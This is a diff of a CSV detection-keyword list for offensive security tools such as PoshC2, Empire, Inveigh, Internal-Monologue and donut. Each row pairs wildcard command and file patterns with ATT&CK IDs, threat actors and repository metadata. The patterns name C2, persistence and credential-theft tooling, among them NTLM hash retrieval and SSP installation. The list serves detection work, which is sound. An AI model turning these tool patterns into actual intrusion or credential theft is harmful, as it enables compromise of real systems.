TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Install-Module ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to 
executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*install-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*install-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Install-ServiceBinary*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Install-SSP -Path*.dll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Install-SSP.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*interactsh -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh*.exe","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh*oast.*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh-client -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh-server -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*installexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-Module ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*install-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*install-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-ServiceBinary*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP -Path*.dll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*interactsh -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*.exe","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh*oast.*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-client -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*interactsh-server -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*Intercepter-NG*","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--interface * --wpad --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Internal-Monologue.exe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueDll*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "*InternalMonologueExe*","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - 
TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","1","N/A","N/A","10","1283","243","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" -"*InternetCrackUrl*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*IntruderPayloads*","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3429","1190","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" -"*-Inveigh *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Inveigh Relay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Inveigh.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*InternetCrackUrl*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*IntruderPayloads*","offensive_tool_keyword","IntruderPayloads","A collection of Burpsuite Intruder payloads. BurpBounty payloads (https://github.com/wagiro/BurpBounty). fuzz lists and pentesting methodologies. To pull down all 3rd party repos. run install.sh in the same directory of the IntruderPayloads folder.","T1101 - T1114 - T1324 - T1559","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/IntruderPayloads","1","0","N/A","N/A","10","3430","1189","2021-09-27T01:47:05Z","2015-10-29T14:57:06Z" +"*-Inveigh *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Inveigh Relay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 